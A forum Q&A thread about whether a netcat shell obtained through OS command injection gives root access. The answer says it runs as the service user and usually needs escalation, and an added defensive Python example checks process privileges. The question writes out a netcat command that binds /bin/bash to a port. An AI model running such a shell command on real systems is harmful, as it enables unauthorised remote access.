
I have a question about privileges when performing an Operating system command injection.

If an attacker succeeds in getting a reverse shell on a remote server through netcat (netcat -v -e '/bin/bash' -l -p 5550), does he/she have admin privileges on the victim machine, or is some sort of escalation needed?

Thanks

1 Answer

Usually, you need some sort of escalation.

If you can run the command netcat -v -e '/bin/bash' -l -p 5550, all you've done (effectively) is have the remote machine open a port for you as the user that was running whatever process ran the command. That is to say, if you managed to inject your netcat command into a www process, you are likely logged in as the 'www' user, and not (if the remote machine has been remotely secured) as root.

Bob Watson
  • Thanks, so it all depends on the target machine... so getting a reverse shell doesn't mean that everything is OK... in most cases I believe that getting access to files on the server is no mean achievement... am I right? – user1990170 Feb 10 '13 at 10:25
  • Yeah - once you have a user shell you can start poking around for other things, and it may be more likely on a machine with at least one major hole that you may find a local escalation you can use. – Bob Watson Feb 10 '13 at 10:31
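
The answer's point, that an injected command runs as whatever account owns the injected process, can be checked from the defender's side. The following is an added example, not part of the original posts: it parses Linux /proc/<pid>/status text and reports the identity a spawned command would inherit. The sample status texts, the function names and the short capability list are constructed for illustration.

```python
# Added example: what identity would a command spawned by this process inherit?
# A child created by fork+exec keeps the parent's effective UID; for a non-root
# parent, only *ambient* capabilities survive the exec (see capabilities(7)).

# Constructed samples of /proc/<pid>/status (not real output).
SAMPLE_WWW = "Name:\thttpd\nUid:\t33\t33\t33\t33\nCapAmb:\t0000000000000000\n"
SAMPLE_ROOT = "Name:\tlegacyd\nUid:\t0\t0\t0\t0\nCapAmb:\t0000000000000000\n"
SAMPLE_AMB = "Name:\tworker\nUid:\t33\t33\t33\t33\nCapAmb:\t0000000000000080\n"

# Capability bit numbers from <linux/capability.h>; a short illustrative subset.
RISKY_CAPS = {"CAP_DAC_OVERRIDE": 1, "CAP_SETUID": 7, "CAP_SYS_ADMIN": 21}


def parse_status(text):
    """Turn 'Key:<tab>v1<tab>v2' lines into {key: [v1, v2, ...]}."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.split()
    return fields


def injection_context(status_text):
    """Summarise the privileges a command injected into this process would get."""
    f = parse_status(status_text)
    _ruid, euid, _suid, _fsuid = (int(x) for x in f["Uid"])
    # CapAmb is absent on kernels older than 4.3; treat that as "none".
    ambient = int(f.get("CapAmb", ["0"])[0], 16)
    risky = [n for n, bit in RISKY_CAPS.items() if ambient & (1 << bit)]
    return {
        "name": f["Name"][0],
        "euid": euid,
        "risky_ambient_caps": risky,
        # Root, or a root-like capability that survives exec, needs no escalation.
        "root_equivalent": euid == 0 or bool(risky),
    }


if __name__ == "__main__":
    for sample in (SAMPLE_WWW, SAMPLE_ROOT, SAMPLE_AMB):
        print(injection_context(sample))
```

On a live Linux host the same function can be fed the contents of /proc/<pid>/status for each network-facing service to find the ones where a command injection would need no local escalation.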